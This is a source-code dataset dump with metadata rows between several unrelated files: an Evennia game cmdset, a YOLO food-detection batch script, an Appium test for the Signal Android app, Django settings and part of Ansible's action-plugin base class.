# any commands you add below will overload the default ones.
#
self.add(general.CmdLook())
self.add(general.CmdGoto())
self.add(general.CmdInventory())
self.add(general.CmdTalk())
self.add(general.CmdDialogue())
self.add(general.CmdLoot())
self.add(general.CmdUse())
self.add(general.CmdDiscard())
self.add(general.CmdEquip())
self.add(general.CmdTakeOff())
self.add(general.CmdCastSkill())
self.add(general.CmdAttack())
self.add(general.CmdMakeMatch())
self.add(general.CmdGetRankings())
self.add(general.CmdQueueUpCombat())
self.add(general.CmdQuitCombatQueue())
self.add(general.CmdConfirmCombat())
self.add(general.CmdRejectCombat())
self.add(general.CmdUnlockExit())
self.add(general.CmdGiveUpQuest())
self.add(general.CmdShopping())
self.add(general.CmdBuy())
self.add(general.CmdSay())
self.add(general.CmdAction())
self.add(general.CmdTest())
# Add empty login commands to the normal cmdset to
# avoid showing wrong cmd messages.
self.add(general.CmdConnect())
self.add(general.CmdCreate())
self.add(general.CmdCreateConnect())
class AccountCmdSet(default_cmds.AccountCmdSet):
"""
This is the cmdset available to the Player at all times. It is
combined with the `CharacterCmdSet` when the Player puppets a
Character. It holds game-account-specific commands, channel
commands, etc.
"""
key = "DefaultAccount"
def at_cmdset_creation(self):
"""
Populates the cmdset
"""
super(AccountCmdSet, self).at_cmdset_creation()
#
# any commands you add below will overload the default ones.
#
self.add(player.CmdQuit())
self.add(player.CmdPuppet())
self.add(player.CmdUnpuppet())
self.add(player.CmdCharCreate())
self.add(player.CmdCharDelete())
self.add(player.CmdCharAll())
class UnloggedinCmdSet(default_cmds.UnloggedinCmdSet):
"""
Command set available to the Session before being logged in. This
holds commands like creating a new account, logging in, etc.
"""
key = "DefaultUnloggedin"
def at_cmdset_creation(self):
"""
Populates the cmdset.
"""
self.add(unloggedin.CmdUnconnectedLoginStart())
self.add(unloggedin.CmdUnconnectedLook())
self.add(unloggedin.CmdUnconnectedCreate())
self.add(unloggedin.CmdUnconnectedConnect())
self.add(unloggedin.CmdUnconnectedQuit())
self.add(unloggedin.CmdQuickLogin())
class SessionCmdSet(default_cmds.SessionCmdSet):
"""
This cmdset is made available on Session level once logged in. It
is empty by default.
"""
key = "DefaultSession"
def at_cmdset_creation(self):
"""
This is the only method defined in a cmdset, called during
its creation. It should populate the set with command instances.
        As an example, we just add the empty base `Command` object.
It prints some info.
"""
super(SessionCmdSet, self).at_cmdset_creation()
#
# any commands you add below will overload the default ones.
#
class CombatCmdSet(CmdSet):
"""
When players are in combat, the combat cmdset will replace the normal cmdset.
    The normal cmdset will be recovered when the combat is over.
"""
key = "combat_cmdset"
mergetype = "Replace"
priority = 10
no_exits = True
def at_cmdset_creation(self):
self.add(general.CmdLook())
self.add(general.CmdCastSkill())
self.add(combat.CmdCombatInfo())
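
# A minimal sketch of how a replace-type cmdset like CombatCmdSet is typically
# swapped in and out at runtime; the cmdset handler calls below follow Evennia's
# usual API but are an assumption here, not something defined in this module:
#
#   character.cmdset.add(CombatCmdSet)      # combat starts: normal commands are replaced
#   ...
#   character.cmdset.delete(CombatCmdSet)   # combat ends: the normal cmdset is recovered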
| [
"[email protected]"
] | |
98981f55c9eccb1768ee4877f1033ddb4650bbc7 | 749cf1cfba5e0113b9619d46aa55edc7abb4aca4 | /src/scs_mfr/test/test.py | ecca4b9e84bbd9f1834c0eea55da6dda3ad04b4f | [
"MIT"
] | permissive | caspar/scs_mfr | b65fcd51e6561370f9fb1d6482f0717d7058e535 | 90f3604190c883c39ceddd1ce56a36d72e628e8d | refs/heads/master | 2020-03-22T22:07:35.063124 | 2018-07-06T12:20:38 | 2018-07-06T12:20:38 | 140,734,794 | 0 | 0 | null | 2018-07-12T15:52:36 | 2018-07-12T15:52:36 | null | UTF-8 | Python | false | false | 1,278 | py | """
Created on 18 May 2017
@author: Bruno Beloff ([email protected])
"""
from abc import abstractmethod
# --------------------------------------------------------------------------------------------------------------------
class Test(object):
"""
classdocs
"""
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, verbose):
self.__verbose = verbose
self.__datum = None
# ----------------------------------------------------------------------------------------------------------------
@abstractmethod
def conduct(self):
pass
# ----------------------------------------------------------------------------------------------------------------
@property
def datum(self):
return self.__datum
@datum.setter
def datum(self, value):
self.__datum = value
@property
def verbose(self):
return self.__verbose
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return self.__class__.__name__ + ":{datum:%s, verbose:%s}" % (self.datum, self.verbose)
| [
"[email protected]"
] | |
0bb37f377bb2db2265a5c0135993cc684a7e3d92 | 467a828e4343c1da949b2ff3559dfbd3281124ab | /multi_detection/ckpt_predict_dir.py | 1985dbbcac6e23cf9cf1d99209193024fcb7a57d | [] | no_license | sunyihuan326/kx_detection | 59a45b09e65544e11a85debeec674fb5e427744c | ecdcc30e0c9afcf80684cc79c175a85f067c2c50 | refs/heads/master | 2021-06-19T04:06:54.821845 | 2021-05-11T08:01:11 | 2021-05-11T08:01:11 | 210,282,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,676 | py | # -*- encoding: utf-8 -*-
"""
Predict results for every image in a directory
@File : ckpt_predict.py
@Time : 2019/12/16 15:45
@Author : sunyihuan
"""
import cv2
import numpy as np
import tensorflow as tf
import multi_detection.core.utils as utils
import os
import time
from multi_detection.food_correct_utils import correct_bboxes, get_potatoml
import shutil
from tqdm import tqdm
# GPU memory limit
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.4
class YoloPredict(object):
'''
    Prediction results
'''
def __init__(self):
        self.input_size = 416  # input image size (square by default)
        self.num_classes = 40  # number of classes
        self.score_cls_threshold = 0.001
        self.score_threshold = 0.8
        self.iou_threshold = 0.5
        self.top_n = 5
        self.weight_file = "E:/ckpt_dirs/Food_detection/multi_food5/20210224/yolov3_train_loss=5.9418.ckpt-148"  # ckpt file path
        # self.weight_file = "./checkpoint/yolov3_train_loss=4.7681.ckpt-80"
        self.write_image = False  # whether to draw and save annotated images
        self.show_label = True  # whether to show labels on the drawn boxes
graph = tf.Graph()
with graph.as_default():
            # load the model
self.saver = tf.train.import_meta_graph("{}.meta".format(self.weight_file))
self.sess = tf.Session(config=config)
self.saver.restore(self.sess, self.weight_file)
            # inputs
self.input = graph.get_tensor_by_name("define_input/input_data:0")
self.trainable = graph.get_tensor_by_name("define_input/training:0")
            # detection outputs
self.pred_sbbox = graph.get_tensor_by_name("define_loss/pred_sbbox/concat_2:0")
self.pred_mbbox = graph.get_tensor_by_name("define_loss/pred_mbbox/concat_2:0")
self.pred_lbbox = graph.get_tensor_by_name("define_loss/pred_lbbox/concat_2:0")
            # oven-layer (rack position) output
self.layer_num = graph.get_tensor_by_name("define_loss/layer_classes:0")
def get_top_cls(self, pred_bbox, org_h, org_w, top_n):
'''
        Get the top_n classes and their scores.
        :param pred_bbox: all predicted boxes
        :param org_h: original image height
        :param org_w: original image width
        :param top_n: number of top entries to keep
        :return: the top_n (class, confidence) pairs sorted by confidence,
        e.g.
        [(18, 0.9916), (19, 0.0105), (15, 0.0038), (1, 0.0018), (5, 0.0016), (13, 0.0011)]
'''
bboxes = utils.postprocess_boxes(pred_bbox, (org_h, org_w), self.input_size, self.score_cls_threshold)
classes_in_img = list(set(bboxes[:, 5]))
best_bboxes = {}
for cls in classes_in_img:
cls_mask = (bboxes[:, 5] == cls)
cls_bboxes = bboxes[cls_mask]
best_score = 0
for i in range(len(cls_bboxes)):
if cls_bboxes[i][-2] > best_score:
best_score = cls_bboxes[i][-2]
if int(cls) not in best_bboxes.keys():
best_bboxes[int(cls)] = round(best_score, 4)
best_bboxes = sorted(best_bboxes.items(), key=lambda best_bboxes: best_bboxes[1], reverse=True)
return best_bboxes[:top_n]
def predict(self, image):
'''
        Run prediction on one image.
        :param image: image data with shape [800, 600, 3]
        :return:
        bboxes: food detection boxes in the format [x_min, y_min, x_max, y_max, probability, cls_id],
        layer_n[0]: oven-layer detection result, 0: bottom layer, 1: middle layer, 2: top layer, 3: other
'''
org_image = np.copy(image)
org_h, org_w, _ = org_image.shape
image_data = utils.image_preporcess(image, [self.input_size, self.input_size])
image_data = image_data[np.newaxis, ...]
pred_sbbox, pred_mbbox, pred_lbbox, layer_n = self.sess.run(
[self.pred_sbbox, self.pred_mbbox, self.pred_lbbox, self.layer_num],
feed_dict={
self.input: image_data,
self.trainable: False
}
)
pred_bbox = np.concatenate([np.reshape(pred_sbbox, (-1, 5 + self.num_classes)),
np.reshape(pred_mbbox, (-1, 5 + self.num_classes)),
np.reshape(pred_lbbox, (-1, 5 + self.num_classes))], axis=0)
        best_bboxes = self.get_top_cls(pred_bbox, org_h, org_w, self.top_n)  # get the top_n classes and confidences
bboxes = utils.postprocess_boxes(pred_bbox, (org_h, org_w), self.input_size, self.score_threshold)
bboxes = utils.nms(bboxes, self.iou_threshold)
return bboxes, layer_n[0], best_bboxes
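
    # Usage sketch (kept as comments so the file's behaviour is unchanged): each row of
    # the returned bboxes follows [x_min, y_min, x_max, y_max, probability, cls_id], and
    # the layer code is 0/1/2/3 for bottom/middle/top/other, as documented above.
    #
    #   Y = YoloPredict()
    #   bboxes, layer, top_cls = Y.predict(cv2.imread("some_image.jpg"))  # path is illustrative
    #   for x_min, y_min, x_max, y_max, prob, cls_id in bboxes:
    #       print(int(cls_id), round(float(prob), 3))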
def result(self, image_path, save_dir):
'''
        Run prediction and save the result.
        :param image_path: path of the input image
        :param save_dir: directory where the original image with predicted boxes drawn is saved
:return:
'''
        image = cv2.imread(image_path)  # read the image
        # image = utils.white_balance(image)  # white-balance the image
        bboxes_pr, layer_n, best_bboxes = self.predict(image)  # prediction results
if self.write_image:
image = utils.draw_bbox(image, bboxes_pr, show_label=self.show_label)
drawed_img_save_to_path = str(image_path).split("/")[-1]
            drawed_img_save_to_path = str(drawed_img_save_to_path).split(".")[0] + "_" + str(
                layer_n) + ".jpg"  # output image path; the layer result is embedded in the file name
# cv2.imshow('Detection result', image)
            cv2.imwrite(save_dir + "/" + drawed_img_save_to_path, image)  # save the image
return bboxes_pr, layer_n, best_bboxes
if __name__ == '__main__':
start_time = time.time()
    img_root = "F:/serve_data/OVEN/nofood148"  # image directory
layer_data_root = "F:/serve_data/OVEN/nofood148_layer_data"
if not os.path.exists(layer_data_root): os.mkdir(layer_data_root)
save_root = "F:/serve_data/OVEN/nofood148_detection"
if not os.path.exists(save_root): os.mkdir(save_root)
Y = YoloPredict()
end_time0 = time.time()
print("model loading time:", end_time0 - start_time)
# cls = ["beefsteak", "cartooncookies", "chickenwings", "chiffoncake6", "chiffoncake8",
# "cookies", "cranberrycookies", "cupcake", "eggtart", "peanuts",
# "pizzacut", "pizzaone", "pizzatwo", "porkchops", "potatocut", "potatol",
# "potatos", "sweetpotatocut", "sweetpotatol", "sweetpotatos",
# "roastedchicken", "toast", "chestnut", "cornone", "corntwo", "drumsticks", "taro",
# "steamedbread", "eggplant", "eggplant_cut_sauce", "bread", "container_nonhigh",
# "container", "fish", "hotdog", "redshrimp",
# "shrimp", "strand"]
# cls = ["cornone", "eggplant", "fish", "nofood", "potatol", "roastedchicken", "shrimp", "toast"]
# cls = ["container", "fish", "nofood", "roastedchicken", "shrimp", "toast"]
# cls = os.listdir(img_root)
classes_id39 = {"cartooncookies": 1, "cookies": 5, "cupcake": 7, "beefsteak": 0, "chickenwings": 2,
"chiffoncake6": 3, "chiffoncake8": 4, "cranberrycookies": 6, "eggtart": 8,
"nofood": 9, "peanuts": 10, "porkchops": 14, "potatocut": 15, "potatol": 16,
"potatos": 17, "sweetpotatocut": 18, "sweetpotatol": 19,
"pizzacut": 11, "pizzaone": 12, "roastedchicken": 21,
"pizzatwo": 13, "sweetpotatos": 20, "toast": 22, "chestnut": 23, "cornone": 24, "corntwo": 25,
"drumsticks": 26,
"taro": 27, "steamedbread": 28, "eggplant": 29, "eggplant_cut_sauce": 30, "bread": 31,
"container_nonhigh": 32,
"container": 33, "duck": 21, "fish": 34, "hotdog": 35, "redshrimp": 36,
"shrimp": 37, "strand": 38, "xizhi": 39, "chiffon_4": 101, "potatom": 40, "sweetpotatom": 41}
cls=[""]
new_classes = {v: k for k, v in classes_id39.items()}
layer_id = {0: "bottom", 1: "middle", 2: "top", 3: "others"}
for c in cls:
img_dir = img_root + "/" + c
save_dir = save_root + "/" + c
layer_data_dir=layer_data_root+"/"+c
if not os.path.exists(layer_data_dir): os.mkdir(layer_data_dir)
for img in tqdm(os.listdir(img_dir)):
if img.endswith("jpg"):
img_path = img_dir + "/" + img
end_time1 = time.time()
bboxes_p, layer_, best_bboxes = Y.result(img_path, save_dir)
                bboxes_pr, layer_n, best_bboxes = correct_bboxes(bboxes_p, layer_, best_bboxes)  # correct the raw outputs
                bboxes_pr, layer_n = get_potatoml(bboxes_pr, layer_n)  # decide medium/large potato and sweet potato classes from the outputs
print(bboxes_pr)
print(layer_n)
                # copy the image into the folder for its detected layer
if not os.path.exists(layer_data_dir + "/" + layer_id[layer_n]): os.mkdir(
layer_data_dir + "/" + layer_id[layer_n])
shutil.copy(img_path, layer_data_dir + "/" + layer_id[layer_n] + "/"+img)
                # move the image into the folder for its detected food class
if len(bboxes_pr) == 0:
if not os.path.exists(img_dir + "/noresult"): os.mkdir(img_dir + "/noresult")
shutil.move(img_path, img_dir + "/noresult" + "/" + img)
else:
pre = int(bboxes_pr[0][-1])
if not os.path.exists(img_dir + "/" + new_classes[pre]): os.mkdir(img_dir + "/" + new_classes[pre])
shutil.move(img_path, img_dir + "/" + new_classes[pre] + "/" + img)
end_time1 = time.time()
print("all data time:", end_time1 - end_time0)
| [
"[email protected]"
] | |
1e290eaf806b12b3d70a04f888edc40c280cb978 | dc871754a421c85177dc00134e227845822154e5 | /Python/EmpireXpOOP2o/Oyun.py | 18526e2a88e5c73b3f009183a49333e01f692477 | [] | no_license | ibrahimylmz3/MedipolCodes | 5af3826dff44be9ce658cf61d637e2c1a4babaf6 | 839afdd74568329184e579805c112773c7b83bc8 | refs/heads/master | 2020-11-27T04:37:25.812720 | 2019-12-20T15:51:52 | 2019-12-20T15:51:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | import Dunya
game = Dunya.dunya()
game.oyuncuSayisi = 6
game.oyuncuEkle()
game.ulkleriOlustur()
game.komsulariBelirle()
| [
"[email protected]"
] | |
bb711b9545190d0bb301ef3888269d53576f13a7 | 8d9318a33afc2c3b5ca8ac99fce0d8544478c94a | /Books/Casandra DB/opscenter-5.1.0/lib/py-win32/2.7/twisted/internet/address.py | aea84bf68bbed91d502c7072beb96a2ac2766dff | [] | no_license | tushar239/git-large-repo | e30aa7b1894454bf00546312a3fb595f6dad0ed6 | 9ee51112596e5fc3a7ab2ea97a86ec6adc677162 | refs/heads/master | 2021-01-12T13:48:43.280111 | 2016-11-01T22:14:51 | 2016-11-01T22:14:51 | 69,609,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:a515bfec9ac845d6ff70998513414bc502c31a8567def729df1252d0faeb057b
size 4196
| [
"[email protected]"
] | |
69ee5e0cc7739ebcbee9d1a3e5819b28dde34833 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/signal/testcase/firstcases/testcase1_016.py | e81237d6fa82e693c08ba184b53c1b1c193da30e | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,616 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.thoughtcrime.securesms',
'appActivity' : 'org.thoughtcrime.securesms.ConversationListActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.thoughtcrime.securesms/org.thoughtcrime.securesms.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase016
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememt(driver, "new UiSelector().resourceId(\"org.thoughtcrime.securesms:id/sms_failed_indicator\").className(\"android.widget.ImageView\")")
TouchAction(driver).long_press(element).release().perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.thoughtcrime.securesms:id/sms_failed_indicator\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"133\")", "new UiSelector().className(\"android.widget.TextView\").instance(3)")
TouchAction(driver).long_press(element).release().perform()
element = getElememtBack(driver, "new UiSelector().text(\"Your version of Signal has expired!\")", "new UiSelector().className(\"android.widget.TextView\").instance(1)")
TouchAction(driver).tap(element).perform()
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"1_016\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'org.thoughtcrime.securesms'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"[email protected]"
] | |
d38fe136135727031be58d9f7ae57117d9659ff6 | 0d45e05e1eda670b233081118bbcb63743c166db | /web/act_assist/settings.py | 98cdcc4d0b82667a1b1f93b5264afd75a34cc1cd | [
"MIT"
] | permissive | maleriepace/activity-assistant | 24ef7e4e6488e31726ba21c07acda83a7119f979 | c5baa21f3d22db18da591ddf76e7bf6a7e7229cc | refs/heads/master | 2023-01-31T15:53:30.100115 | 2020-12-13T14:41:04 | 2020-12-13T14:41:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,996 | py | """
Django settings for hassbrain_web project.
Generated by 'django-admin startproject' using Django 2.1.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
import logging
logger = logging.getLogger(__name__)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
#ALLOWED_HOSTS = ['0.0.0.0', 'localhost']
# allow hosts for the home net
#ALLOWED_HOSTS += ['192.168.178.{}'.format(j) for j in range(256)]
ALLOWED_HOSTS = ['*'] # TODO debug measure
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles', 'rest_framework', 'qr_code',
'rest_framework.authtoken',
'frontend.apps.FrontendConfig',
'backend.apps.BackendConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'act_assist.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'act_assist.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
# every use is corrected by our own methods, e.g. current_time in frontend.util
TIME_ZONE = 'UTC'
USE_TZ = False
USE_I18N = True
USE_L10N = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
SERVE_MEDIA = True
MEDIA_URL = '/media/'
HASS_API_URL = 'http://supervisor/core/api'
DATA_ROOT = '/data/'
MEDIA_ROOT = DATA_ROOT + 'media/'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': DATA_ROOT + 'db.sqlite3',
}
}
# experiment
POLL_INTERVAL_LST = ['5s', '1m', '10m', '30m', '2h', '6h']
DATASET_PATH = DATA_ROOT + 'datasets/' # path where all the datasets lie
ACTIVITY_FILE_NAME="activities_subject_%s.csv"
ACTIVITY_MAPPING_FILE_NAME="activity_mapping.csv"
DATA_FILE_NAME='devices.csv'
DATA_MAPPING_FILE_NAME='device_mapping.csv'
PRIOR_ACTIVITY_FILE_NAME = "prior_activities_subject_%s.csv"
DEV_ROOM_ASSIGNMENT_FILE_NAME = "devices_and_areas.csv"
ACT_ROOM_ASSIGNMENT_FILE_NAME = "activities_and_areas.csv"
DB_URL = 'sqlite:////config/home-assistant_v2.db'
ACT_ASSIST_VERSION = "v0.0.1-alpha"
ACT_ASSIST_RELEASE_LINK = "https://github.com/tcsvn/activity-assistant-logger/releases/download/{}/activity-assistant.apk".format(ACT_ASSIST_VERSION)
# API URLS
URL_SERVER = r'server'
URL_DEVICE_PREDICTIONS = r'devicepredictions'
URL_ACTIVITY_PREDICTIONS = r'activitypredictions'
URL_PERSONS = r'/person/'
URL_SYNTHETIC_ACTIVITY = r'syntheticactivity'
URL_DEVICE_COMPONENT = r'devcomp'
# qrcode cache
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'qr-code': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'qr-code-cache',
'TIMEOUT': 3600
}
}
QR_CODE_CACHE_ALIAS = 'qr-code'
from os import environ
ENV_SETTINGS = environ.get('DJANGO_ENV') or 'development'
if ENV_SETTINGS == 'development':
try:
from act_assist.local_settings.development import *
except ImportError:
logger.error('couldn\'t import development settings')
raise
elif ENV_SETTINGS == 'production':
try:
from act_assist.local_settings.production import *
except ImportError:
logger.error('couldn\'t import development settings')
raise
| [
"[email protected]"
] | |
3e28462872d134c1fbcd211fc3c8b0fff0004cc3 | c50c7111279fc9cfb75f414bf72b7faeb3aa93bc | /raise.py | 7161dd53a065fee7228038e606e670a75e67b1e7 | [] | no_license | Hemanthtm2/Python | d95cbd89778074dc87d75e86c75f998b6e419c93 | 64a21c9a6dadf2bb92616fbdc4209119afcaa562 | refs/heads/master | 2021-08-24T07:24:20.509134 | 2017-11-07T18:35:44 | 2017-11-07T18:35:44 | 108,621,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | #!/usr/bin/pyrhon
def inputnumber():
x=input('Pick a number')
if x==17:
raise ValueError,'17 is a bad number'
return x
print inputnumber()
| [
"[email protected]"
] | |
37af8208dcb36c4044221093bb7d68406fb2b9e3 | 9cd8f44aad83309c2a5dd6886bb4cab82453ad4f | /usr/lib/python2.7/dist-packages/ansible/plugins/action/__init__.py | 8f0c1055725ae44ac60ee0f524e1027040857a3f | [
"Python-2.0"
] | permissive | kojitaniguchi/isucon-summer | 4608c1a93d728432ff948340b888c9eb2aa8a34b | e790277ecbdda638bd0d212460a15b601c0d47dc | refs/heads/master | 2022-10-30T00:14:59.442906 | 2017-08-25T09:01:16 | 2017-08-25T09:01:16 | 101,384,555 | 1 | 1 | null | 2022-10-28T10:54:17 | 2017-08-25T08:41:55 | null | UTF-8 | Python | false | false | 27,151 | py | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import base64
import json
import os
import pipes
import random
import stat
import tempfile
import time
from abc import ABCMeta, abstractmethod
from ansible.compat.six import binary_type, text_type, iteritems, with_metaclass
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleConnectionFailure
from ansible.executor.module_common import modify_module
from ansible.parsing.utils.jsonify import jsonify
from ansible.utils.unicode import to_bytes, to_unicode
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class ActionBase(with_metaclass(ABCMeta, object)):
'''
This class is the base class for all action plugins, and defines
code common to all actions. The base class handles the connection
by putting/getting files and executing commands based on the current
action in use.
'''
def __init__(self, task, connection, play_context, loader, templar, shared_loader_obj):
self._task = task
self._connection = connection
self._play_context = play_context
self._loader = loader
self._templar = templar
self._shared_loader_obj = shared_loader_obj
# Backwards compat: self._display isn't really needed, just import the global display and use that.
self._display = display
self._supports_check_mode = True
@abstractmethod
def run(self, tmp=None, task_vars=None):
""" Action Plugins should implement this method to perform their
tasks. Everything else in this base class is a helper method for the
action plugin to do that.
:kwarg tmp: Temporary directory. Sometimes an action plugin sets up
a temporary directory and then calls another module. This parameter
allows us to reuse the same directory for both.
:kwarg task_vars: The variables (host vars, group vars, config vars,
etc) associated with this task.
:returns: dictionary of results from the module
Implementors of action modules may find the following variables especially useful:
* Module parameters. These are stored in self._task.args
"""
# store the module invocation details into the results
results = {}
if self._task.async == 0:
results['invocation'] = dict(
module_name = self._task.action,
module_args = self._task.args,
)
return results
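
    # Hedged sketch of what a concrete action plugin's run() typically looks like;
    # the _execute_module helper and the 'ping' module name are assumptions used only
    # for illustration and are not defined in the lines above:
    #
    #   class ActionModule(ActionBase):
    #       def run(self, tmp=None, task_vars=None):
    #           result = super(ActionModule, self).run(tmp, task_vars)
    #           # module parameters are available as self._task.args
    #           result.update(self._execute_module(module_name='ping', task_vars=task_vars))
    #           return result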
def _configure_module(self, module_name, module_args, task_vars=None):
'''
Handles the loading and templating of the module code through the
modify_module() function.
'''
if task_vars is None:
task_vars = dict()
# Search module path(s) for named module.
for mod_type in self._connection.module_implementation_preferences:
# Check to determine if PowerShell modules are supported, and apply
# some fixes (hacks) to module name + args.
if mod_type == '.ps1':
# win_stat, win_file, and win_copy are not just like their
# python counterparts but they are compatible enough for our
# internal usage
if module_name in ('stat', 'file', 'copy') and self._task.action != module_name:
module_name = 'win_%s' % module_name
# Remove extra quotes surrounding path parameters before sending to module.
if module_name in ('win_stat', 'win_file', 'win_copy', 'slurp') and module_args and hasattr(self._connection._shell, '_unquote'):
for key in ('src', 'dest', 'path'):
if key in module_args:
module_args[key] = self._connection._shell._unquote(module_args[key])
module_path = self._shared_loader_obj.module_loader.find_plugin(module_name, mod_type)
if module_path:
break
else:
# Use Windows version of ping module to check module paths when
# using a connection that supports .ps1 suffixes. We check specifically
# for win_ping here, otherwise the code would look for ping.ps1
if '.ps1' in self._connection.module_implementation_preferences:
ping_module = 'win_ping'
else:
ping_module = 'ping'
module_path2 = self._shared_loader_obj.module_loader.find_plugin(ping_module, self._connection.module_implementation_preferences)
if module_path2 is not None:
raise AnsibleError("The module %s was not found in configured module paths" % (module_name))
else:
raise AnsibleError("The module %s was not found in configured module paths. "
"Additionally, core modules are missing. If this is a checkout, "
"run 'git submodule update --init --recursive' to correct this problem." % (module_name))
# insert shared code and arguments into the module
(module_data, module_style, module_shebang) = modify_module(module_path, module_args, task_vars=task_vars)
return (module_style, module_shebang, module_data)
def _compute_environment_string(self):
'''
Builds the environment string to be used when executing the remote task.
'''
final_environment = dict()
if self._task.environment is not None:
environments = self._task.environment
if not isinstance(environments, list):
environments = [ environments ]
# the environments as inherited need to be reversed, to make
# sure we merge in the parent's values first so those in the
# block then task 'win' in precedence
environments.reverse()
for environment in environments:
if environment is None:
continue
temp_environment = self._templar.template(environment)
if not isinstance(temp_environment, dict):
raise AnsibleError("environment must be a dictionary, received %s (%s)" % (temp_environment, type(temp_environment)))
